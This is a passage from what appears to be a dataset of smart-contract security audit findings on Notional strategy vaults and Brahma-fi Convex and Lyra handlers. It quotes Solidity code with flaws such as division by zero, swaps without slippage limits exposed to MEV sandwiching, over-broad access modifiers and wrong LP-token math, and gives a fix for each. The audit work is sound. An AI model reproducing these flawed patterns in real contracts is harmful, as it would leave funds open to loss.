STAKEPOOL;\\n```\\n -Handle division by 0чmediumчThere are a few places in the code where division by zero may occur but isn't handled.\\nIf the vault settles at exactly 0 value with 0 remaining strategy token value, there may be an unhandled division by zero trying to divide claims on the settled assets:\\n```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n\\nIf a vault account is entirely insolvent and its `vaultShareValue` is zero, there will be an unhandled division by zero during liquidation:\\n```\\nuint256 vaultSharesToLiquidator;\\n{\\n vaultSharesToLiquidator = vaultAccount.tempCashBalance.toUint()\\n .mul(vaultConfig.liquidationRate.toUint())\\n .mul(vaultAccount.vaultShares)\\n .div(vaultShareValue.toUint())\\n .div(uint256(Constants.RATE\\_PRECISION));\\n}\\n```\\n\\nIf a vault account's secondary debt is being repaid when there is none, there will be an unhandled division by zero:\\n```\\nVaultSecondaryBorrowStorage storage balance =\\n LibStorage.getVaultSecondaryBorrow()[vaultConfig.vault][maturity][currencyId];\\nuint256 totalfCashBorrowed = balance.totalfCashBorrowed;\\nuint256 totalAccountDebtShares = balance.totalAccountDebtShares;\\n\\nfCashToLend = debtSharesToRepay.mul(totalfCashBorrowed).div(totalAccountDebtShares).toInt();\\n```\\n\\nWhile these cases may be unlikely today, this code could be reutilized in other circumstances later that could cause reverts and even disrupt operations more frequently.чHandle the cases where the denominator could be zero appropriately.чч```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n -Increasing a leveraged position in a vault with secondary borrow currency will revertчlowчFrom the client's specifications for the strategy vaults, we know that accounts should be able to increase their leveraged positions before maturity. This property will not hold for the vaults that require borrowing a secondary currency to enter a position. When an account opens its position in such vault for the first time, the `VaultAccountSecondaryDebtShareStorage.maturity` is set to the maturity an account has entered. When the account is trying to increase the debt position, an accounts current maturity will be checked, and since it is not set to 0, as in the case where an account enters the vault for the first time, nor it is smaller than the new maturity passed by an account as in case of a rollover, the code will revert.\\n```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\nчIn order to fix this issue, we recommend that `<` is replaced with `<=` so that account can enter the vault maturity the account is already in as well as the future once.чч```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n -Secondary Currency debt is not managed by the Notional ControllerчlowчSome of the Notional Strategy Vaults may allow for secondary currencies to be borrowed as part of the same strategy. For example, a strategy may allow for USDC to be its primary borrow currency as well as have ETH as its secondary borrow currency.\\nIn order to enter the vault, a user would have to deposit `depositAmountExternal` of the primary borrow currency when calling `VaultAccountAction.enterVault()`. This would allow the user to borrow with leverage, as long as the `vaultConfig.checkCollateralRatio()` check on that account succeeds, which is based on the initial deposit and borrow currency amounts. This collateral ratio check is then performed throughout that user account's lifecycle in that vault, such as when they try to roll their maturity, or when liquidators try to perform collateral checks to ensure there is no bad debt.\\nHowever, in the event that the vault has a secondary borrow currency as well, that additional secondary debt is not calculated as part of the `checkCollateralRatio()` check. The only debt that is being considered is the `vaultAccount.fCash` that corresponds to the primary borrow currency debt:\\n```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n\\n```\\nfunction calculateCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n address account,\\n uint256 vaultShares,\\n int256 fCash\\n) internal view returns (int256 collateralRatio, int256 vaultShareValue) {\\n vaultShareValue = vaultState.getCashValueOfShare(vaultConfig, account, vaultShares);\\n\\n // We do not discount fCash to present value so that we do not introduce interest\\n // rate risk in this calculation. The economic benefit of discounting will be very\\n // minor relative to the added complexity of accounting for interest rate risk.\\n\\n // Convert fCash to a positive amount of asset cash\\n int256 debtOutstanding = vaultConfig.assetRate.convertFromUnderlying(fCash.neg());\\n```\\n\\nWhereas the value of strategy tokens that belong to that user account are being calculated by calling `IStrategyVault(vault).convertStrategyToUnderlying()` on the associated strategy vault:\\n```\\nfunction getCashValueOfShare(\\n VaultState memory vaultState,\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 vaultShares\\n) internal view returns (int256 assetCashValue) {\\n if (vaultShares == 0) return 0;\\n (uint256 assetCash, uint256 strategyTokens) = getPoolShare(vaultState, vaultShares);\\n int256 underlyingInternalStrategyTokenValue = \\_getStrategyTokenValueUnderlyingInternal(\\n vaultConfig.borrowCurrencyId, vaultConfig.vault, account, strategyTokens, vaultState.maturity\\n );\\n```\\n\\n```\\nfunction \\_getStrategyTokenValueUnderlyingInternal(\\n uint16 currencyId,\\n address vault,\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity\\n) private view returns (int256) {\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // This will be true if the the token is \"NonMintable\" meaning that it does not have\\n // an underlying token, only an asset token\\n if (token.decimals == 0) token = TokenHandler.getAssetToken(currencyId);\\n\\n return token.convertToInternal(\\n IStrategyVault(vault).convertStrategyToUnderlying(account, strategyTokens, maturity)\\n );\\n}\\n```\\n\\nFrom conversations with the Notional team, it is assumed that this call returns the strategy token value subtracted against the secondary currencies debt, as is the case in the `Balancer2TokenVault` for example. In other words, when collateral ratio checks are performed, those strategy vaults that utilize secondary currency borrows would need to calculate the value of strategy tokens already accounting for any secondary debt. However, this is a dependency for a critical piece of the Notional controller's strategy vaults collateral checks.\\nTherefore, even though the strategy vaults' code and logic would be vetted before their whitelisting into the Notional system, they would still remain an external dependency with relatively arbitrary code responsible for the liquidation infrastructure that could lead to bad debt or incorrect liquidations if the vaults give inaccurate information, and thus potential loss of funds.чSpecific strategy vault implementations using secondary borrows were not in scope of this audit. However, since the core Notional Vault system was, and it includes secondary borrow currency functionality, from the point of view of the larger Notional system it is recommended to include secondary debt checks within the Notional controller contract to reduce external dependency on the strategy vaults' logic.чч```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n -Vaults are unable to borrow single secondary currencyчlowчAs was previously mentioned some strategies `require` borrowing one or two secondary currencies. All secondary currencies have to be whitelisted in the `VaultConfig.secondaryBorrowCurrencies`. Borrow operation on secondary currencies is performed in the `borrowSecondaryCurrencyToVault(...)` function. Due to a `require` statement in that function, vaults will only be able to borrow secondary currencies if both of the currencies are whitelisted in `VaultConfig.secondaryBorrowCurrencies`. Considering that many strategies will have just one secondary currency, this will prevent those strategies from borrowing any secondary assets.\\n```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\nчWe suggest that the `&&` operator is replaced by the `||` operator. Ideally, an additional check will be performed that will ensure that values in argument arrays `fCashToBorrow`, `maxBorrowRate`, and `minRollLendRate` are passed under the same index as the whitelisted currencies in `VaultConfig.secondaryBorrowCurrencies`.\\n```\\nfunction borrowSecondaryCurrencyToVault(\\n address account,\\n uint256 maturity,\\n uint256[2] calldata fCashToBorrow,\\n uint32[2] calldata maxBorrowRate,\\n uint32[2] calldata minRollLendRate\\n) external override returns (uint256[2] memory underlyingTokensTransferred) {\\n```\\nчч```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n -An account roll may be impossible if the vault is already at the maximum borrow capacity.чlowчOne of the actions allowed in Notional Strategy Vaults is to roll an account's maturity to a later one by borrowing from a later maturity and repaying that into the debt of the earlier maturity.\\nHowever, this could cause an issue if the vault is at maximum capacity at the time of the roll. When an account performs this type of roll, the new borrow would have to be more than the existing debt simply because it has to at least cover the existing debt and pay for the borrow fees that get added on every new borrow. Since the whole vault was already at max borrow capacity before with the old, smaller borrow, this process would revert at the end after the new borrow as well once the process gets to `VaultAccount.updateAccountfCash` and VaultConfiguration.updateUsedBorrowCapacity:\\n```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), \"Max Capacity\");\\n```\\n\\nThe result is that users won't able to roll while the vault is at max capacity. However, users may exit some part of their position to reduce their borrow, thereby reducing the overall vault borrow capacity, and then could execute the roll. A bigger problem would occur if the vault configuration got updated to massively reduce the borrow capacity, which would force users to exit their position more significantly with likely a much smaller chance at being able to roll.чDocument this case so that users can realise that rolling may not always be an option. Perhaps consider adding ways where users can pay a small deposit, like on `enterVault`, to offset the additional difference in borrows and pay for fees so they can remain with essentially the same size position within Notional.чч```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), \"Max Capacity\");\\n```\\n -Rollover might introduce economically impractical deposits of dust into a strategyчlowчDuring the rollover of the strategy position into a longer maturity, several things happen:\\nFunds are borrowed from the longer maturity to pay off the debt and fees of the current maturity.\\nStrategy tokens that are associated with the current maturity are moved to the new maturity.\\nAny additional funds provided by the account are deposited into the strategy into a new longer maturity.\\nIn reality, due to the AMM nature of the protocol, the funds borrowed from the new maturity could exceed the debt the account has in the current maturity, resulting in a non-zero `vaultAccount.tempCashBalance`. In that case, those funds will be deposited into the strategy. That would happen even if there are no external funds supplied by the account for the deposit.\\nIt is possible that the dust in the temporary account balance will not cover the gas cost of triggering a full deposit call of the strategy.\\n```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\nчWe suggest that additional checks are introduced that would check that on rollover `vaultAccount.tempCashBalance + additionalUnderlyingExternal > 0` or larger than a certain threshold like `minAccountBorrowSize` for example.чч```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n -Strategy vault swaps can be frontrunчlowчSome strategy vaults utilize borrowing one currency, swapping it for another, and then using the new currency somewhere to generate yield. For example, the CrossCurrencyfCash strategy vault could borrow USDC, swap it for DAI, and then deposit that DAI back into Notional if the DAI lending interest rates are greater than USDC borrowing interest rates. However, during vault settlement the assets would need to be swapped back into the original borrow currency.\\nSince these vaults control the borrowed assets that go only into white-listed strategies, the Notional system allows users to borrow multiples of their posted collateral and claim the yield from a much larger position. As a result, these strategy vaults would likely have significant funds being borrowed and managed into these strategies.\\nHowever, as mentioned above, these strategies usually utilize a trading mechanism to swap borrowed currencies into whatever is required by the strategy, and these trades may be quite large. In fact, the `BaseStrategyVault` implementation contains functions that interact with Notional's trading module to assist with those swaps:\\n```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n\\nAlthough some strategies may manage stablecoin <-> stablecoin swaps that typically would incur low slippage, large size trades could still suffer from low on-chain liquidity and end up getting frontrun and “sandwiched” by MEV bots or other actors, thereby extracting maximum amount from the strategy vault swaps as slippage permits. This could be especially significant during vaults' settlements, that can be initiated by anyone, as lending currencies may be swapped in large batches and not do it on a per-account basis. For example with the CrossCurrencyfCash vault, it can only enter settlement if all strategy tokens (lending currency in this case) are gone and swapped back into the borrow currency:\\n```\\nif (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n}\\n```\\n\\nAs a result, in addition to the risk of stablecoins' getting off-peg, unfavorable market liquidity conditions and arbitrage-seeking actors could eat into the profits generated by this strategy as per the maximum allowed slippage. However, during settlement the strategy vaults don't have the luxury of waiting for the right conditions to perform the trade as the borrows need to repaid at their maturities.\\nSo, the profitability of the vaults, and therefore users, could suffer due to potential low market liquidity allowing high slippage and risks of being frontrun with the chosen strategy vaults' currencies.чEnsure that the currencies chosen to generate yield in the strategy vaults have sufficient market liquidity on exchanges allowing for low slippage swaps.чч```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n -ConvexPositionHandler._claimRewards incorrectly calculates amount of LP tokens to unstakeчhighч`ConvexPositionHandler._claimRewards` is an internal function that harvests Convex reward tokens and takes the generated yield in ETH out of the Curve pool by calculating the difference in LP token price. To do so, it receives the current share price of the curve LP tokens and compares it to the last one stored in the contract during the last rewards claim. The difference in share price is then multiplied by the LP token balance to get the ETH yield via the `yieldEarned` variable:\\n```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n\\nHowever, to receive this ETH yield, LP tokens need to be unstaked from the Convex pool and then converted via the Curve pool. To do this, the contract introduces lpTokenEarned:\\n```\\nuint256 lpTokenEarned = yieldEarned / NORMALIZATION\\_FACTOR; // 18 decimal from virtual price\\n```\\n\\nThis calculation is incorrect. It uses yieldEarned which is denominated in ETH and simply divides it by the normalization factor to get the correct number of decimals, which still returns back an amount denominated in ETH, whereas an amount denominated in LP tokens should be returned instead.\\nThis could lead to significant accounting issues including losses in the “no-loss” parts of the vault's strategy as 1 LP token is almost always guaranteed to be worth more than 1 ETH. So, when the intention is to withdraw `X` ETH worth of an LP token, withdrawing `X` LP tokens will actually withdraw `Y` ETH worth of an LP token, where `Y>X`. As a result, less than expected ETH will remain in the Convex handler part of the vault, and the ETH yield will go to the Lyra options, which are much riskier. In the event Lyra options don't work out and there is more ETH withdrawn than expected, there is a possibility that this would result in a loss for the vault.чThe fix is straightforward and that is to calculate `lpTokenEarned` using the `currentSharePrice` already received from the Curve pool. That way, it is the amount of LP tokens that will be sent to be unwrapped and unstaked from the Convex and Curve pools. This will also take care of the normalization factor. `uint256 `lpTokenEarned` = yieldEarned / currentSharePrice;`чч```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n -The WETH tokens are not taken into account in the ConvexTradeExecutor.totalFunds functionчhighчThe `totalFunds` function of every executor should include all the funds that belong to the contract:\\n```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n\\nThe `ConvexTradeExecutor` uses this function for calculations:\\n```\\nfunction positionInWantToken()\\n public\\n view\\n override\\n returns (uint256, uint256)\\n{\\n (\\n uint256 stakedLpBalanceInETH,\\n uint256 lpBalanceInETH,\\n uint256 ethBalance\\n ) = \\_getTotalBalancesInETH(true);\\n\\n return (\\n stakedLpBalanceInETH + lpBalanceInETH + ethBalance,\\n block.number\\n );\\n}\\n```\\n\\n```\\nfunction \\_getTotalBalancesInETH(bool useVirtualPrice)\\n internal\\n view\\n returns (\\n uint256 stakedLpBalance,\\n uint256 lpTokenBalance,\\n uint256 ethBalance\\n )\\n{\\n uint256 stakedLpBalanceRaw = baseRewardPool.balanceOf(address(this));\\n uint256 lpTokenBalanceRaw = lpToken.balanceOf(address(this));\\n\\n uint256 totalLpBalance = stakedLpBalanceRaw + lpTokenBalanceRaw;\\n\\n // Here, in order to prevent price manipulation attacks via curve pools,\\n // When getting total position value -> its calculated based on virtual price\\n // During withdrawal -> calc\\_withdraw\\_one\\_coin() is used to get an actual estimate of ETH received if we were to remove liquidity\\n // The following checks account for this\\n uint256 totalLpBalanceInETH = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(totalLpBalance)\\n : \\_lpTokenValueInETH(totalLpBalance);\\n\\n lpTokenBalance = useVirtualPrice\\n ? \\_lpTokenValueInETHFromVirtualPrice(lpTokenBalanceRaw)\\n : \\_lpTokenValueInETH(lpTokenBalanceRaw);\\n\\n stakedLpBalance = totalLpBalanceInETH - lpTokenBalance;\\n ethBalance = address(this).balance;\\n}\\n```\\n\\nThis function includes ETH balance, LP balance, and staked balance. But WETH balance is not included here. WETH tokens are initially transferred to the contract, and before the withdrawal, the contract also stores WETH.чInclude WETH balance into the `totalFunds`.чч```\\nfunction totalFunds() public view override returns (uint256, uint256) {\\n return ConvexPositionHandler.positionInWantToken();\\n}\\n```\\n -LyraPositionHandlerL2 inaccurate modifier onlyAuthorized may lead to funds loss if keeper is compromisedчmediumчThe `LyraPositionHandlerL2` contract is operated either by the L2 keeper or by the L1 `LyraPositionHandler` via the `L2CrossDomainMessenger`. This is implemented through the `onlyAuthorized` modifier:\\n```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n \"ONLY\\_AUTHORIZED\"\\n );\\n \\_;\\n}\\n```\\n\\nThis is set on:\\n`withdraw()`\\n`openPosition()`\\n`closePosition()`\\n`setSlippage()`\\n`deposit()`\\n`sweep()`\\n`setSocketRegistry()`\\n`setKeeper()`\\nFunctions 1-3 have a corresponding implementation on the L1 `LyraPositionHandler`, so they could indeed be called by it with the right parameters. However, 4-8 do not have an implemented way to call them from L1, and this modifier creates an unnecessarily expanded list of authorised entities that can call them.\\nAdditionally, even if their implementation is provided, it needs to be done carefully because `msg.sender` in their case is going to end up being the `L2CrossDomainMessenger`. For example, the `sweep()` function sends any specified token to `msg.sender`, with the intention likely being that the recipient is under the team's or the governance's control - yet, it will be `L2CrossDomainMessenger` and the tokens will likely be lost forever instead.\\nOn the other hand, the `setKeeper()` function would need a way to be called by something other than the keeper because it is intended to change the keeper itself. In the event that the access to the L2 keeper is compromised, and the L1 `LyraPositionHandler` has no way to call `setKeeper()` on the `LyraPositionHandlerL2`, the whole contract and its funds will be compromised as well. So, there needs to be some way to at least call the `setKeeper()` by something other than the keeper to ensure security of the funds on L2.\\n```\\nfunction closePosition(bool toSettle) public override onlyAuthorized {\\n LyraController.\\_closePosition(toSettle);\\n UniswapV3Controller.\\_estimateAndSwap(\\n false,\\n LyraController.sUSD.balanceOf(address(this))\\n );\\n}\\n\\n/\\*///////////////////////////////////////////////////////////////\\n MAINTAINANCE FUNCTIONS\\n//////////////////////////////////////////////////////////////\\*/\\n\\n/// @notice Sweep tokens\\n/// @param \\_token Address of the token to sweepr\\nfunction sweep(address \\_token) public override onlyAuthorized {\\n IERC20(\\_token).transfer(\\n msg.sender,\\n IERC20(\\_token).balanceOf(address(this))\\n );\\n}\\n\\n/// @notice socket registry setter\\n/// @param \\_socketRegistry new address of socket registry\\nfunction setSocketRegistry(address \\_socketRegistry) public onlyAuthorized {\\n socketRegistry = \\_socketRegistry;\\n}\\n\\n/// @notice keeper setter\\n/// @param \\_keeper new keeper address\\nfunction setKeeper(address \\_keeper) public onlyAuthorized {\\n keeper = \\_keeper;\\n}\\n```\\nчCreate an additional modifier for functions intended to be called just by the keeper (onlyKeeper) such as functions 4-7, and create an additional modifier `onlyGovernance` for the `setKeeper()` function. As an example, the L1 `Vault` contract also has a `setKeeper()` function that has a `onlyGovernance()` modifier. Please note that this will likely require implementing a function for the system's governance that can call `LyraPositionHandlerL2.setKeeper()` via the `L2CrossDomainMessenger`.чч```\\nmodifier onlyAuthorized() {\\n require(\\n ((msg.sender == L2CrossDomainMessenger &&\\n OptimismL2Wrapper.messageSender() == positionHandlerL1) ||\\n msg.sender == keeper),\\n \"ONLY\\_AUTHORIZED\"\\n );\\n \\_;\\n}\\n```\\n -Harvester.harvest swaps have no slippage parametersчmediumчAs part of the vault strategy, all reward tokens for staking in the Convex ETH-stETH pool are claimed and swapped into ETH. The swaps for these tokens are done with no slippage at the moment, i.e. the expected output amount for all of them is given as 0.\\nIn particular, one reward token that is most susceptible to slippage is LDO, and its swap is implemented through the Uniswap router:\\n```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n\\nThe swap is called with `amountOutMinimum: 0`, meaning that there is no slippage protection in this swap. This could result in a significant loss of yield from this reward as MEV bots could “sandwich” this swap by manipulating the price before this transaction and immediately reversing their action after the transaction, profiting at the expense of our swap. Moreover, the Uniswap pools seem to have low liquidity for the LDO token as opposed to Balancer or Sushiswap, further magnifying slippage issues and susceptibility to frontrunning.\\nThe other two tokens - CVX and CRV - are being swapped through their Curve pools, which have higher liquidity and are less susceptible to slippage. Nonetheless, MEV strategies have been getting more advanced and calling these swaps with 0 as expected output may place these transactions in danger of being frontrun and “sandwiched” as well.\\n```\\nif (cvxBalance > 0) {\\n cvxeth.exchange(1, 0, cvxBalance, 0, false);\\n}\\n// swap CRV to WETH\\nif (crvBalance > 0) {\\n crveth.exchange(1, 0, crvBalance, 0, false);\\n}\\n```\\n\\nIn these calls `.exchange` , the last `0` is the `min_dy` argument in the Curve pools swap functions that represents the minimum expected amount of tokens received after the swap, which is `0` in our case.чIntroduce some slippage parameters into the swaps.чч```\\nfunction \\_swapLidoForWETH(uint256 amountToSwap) internal {\\n IUniswapSwapRouter.ExactInputSingleParams\\n memory params = IUniswapSwapRouter.ExactInputSingleParams({\\n tokenIn: address(ldo),\\n tokenOut: address(weth),\\n fee: UNISWAP\\_FEE,\\n recipient: address(this),\\n deadline: block.timestamp,\\n amountIn: amountToSwap,\\n amountOutMinimum: 0,\\n sqrtPriceLimitX96: 0\\n });\\n uniswapRouter.exactInputSingle(params);\\n}\\n```\\n -Harvester.rewardTokens doesn't account for LDO tokensчmediumчAs part of the vault's strategy, the reward tokens for participating in Curve's ETH-stETH pool and Convex staking are claimed and swapped for ETH. This is done by having the `ConvexPositionHandler` contract call the reward claims API from Convex via `baseRewardPool.getReward()`, which transfers the reward tokens to the handler's address. Then, the tokens are iterated through and sent to the harvester to be swapped from `ConvexPositionHandler` by getting their list from `harvester.rewardTokens()` and calling `harvester.harvest()`\\n```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n\\nHowever, `harvester.rewardTokens()` doesn't have the LDO token's address in its list, so they will not be transferred to the harvester to be swapped.\\n```\\nfunction rewardTokens() external pure override returns (address[] memory) {\\n address[] memory rewards = new address[](2);\\n rewards[0] = address(crv);\\n rewards[1] = address(cvx);\\n return rewards;\\n}\\n```\\n\\nAs a result, `harvester.harvest()` will not be able to execute its `_swapLidoForWETH()` function since its `ldoBalance` will be 0. This results in missed rewards and therefore yield for the vault as part of its normal flow.\\nThere is a possible mitigation in the current state of the contract that would require governance to call `sweep()` on the LDO balance from the `BaseTradeExecutor` contract (that `ConvexPositionHandler` inherits) and then transferring those LDO tokens to the harvester contract to perform the swap at a later rewards claim. This, however, requires transactions separate from the intended flow of the system as well as governance intervention.чAdd the LDO token address to the `rewardTokens()` function by adding the following line `rewards[2] = address(ldo);`чч```\\n// get list of tokens to transfer to harvester\\naddress[] memory rewardTokens = harvester.rewardTokens();\\n//transfer them\\nuint256 balance;\\nfor (uint256 i = 0; i < rewardTokens.length; i++) {\\n balance = IERC20(rewardTokens[i]).balanceOf(address(this));\\n\\n if (balance > 0) {\\n IERC20(rewardTokens[i]).safeTransfer(\\n address(harvester),\\n balance\\n );\\n }\\n}\\n\\n// convert all rewards to WETH\\nharvester.harvest();\\n```\\n -Keeper design complexityчmediumчThe current design of the protocol relies on the keeper being operated correctly in a complex manner. Since the offchain code for the keeper wasn't in scope of this audit, the following is a commentary on the complexity of the keeper operations in the context of the contracts. Keeper logic such as the order of operations and function argument parameters with log querying are some examples where if the keeper doesn't execute them correctly, there may be inconsistencies and issues with accounting of vault shares and vault funds resulting in unexpected behaviour. While it may represent little risk or issues to the current Brahma-fi team as the vault is recently live, the keeper logic and exact steps should be well documented so that public keepers (if and when they are enabled) can execute the logic securely and future iterations of the vault code can account for any intricacies of the keeper logic.\\n1. Order of operations: Convex rewards & new depositors profiting at the expense of old depositors' yielded reward tokens. As part of the vault's strategy, the depositors' ETH is provided to Curve and the LP tokens are staked in Convex, which yield rewards such as CRV, CVX, and LDO tokens. As new depositors provide their ETH, the vault shares minted for their deposits will be less compared to old deposits as they account for the increasing value of LP tokens staked in these pools. In other words, if the first depositor provides 1 ETH, then when a new depositor provides 1 ETH much later, the new depositor will get less shares back as the `totalVaultFunds()` will 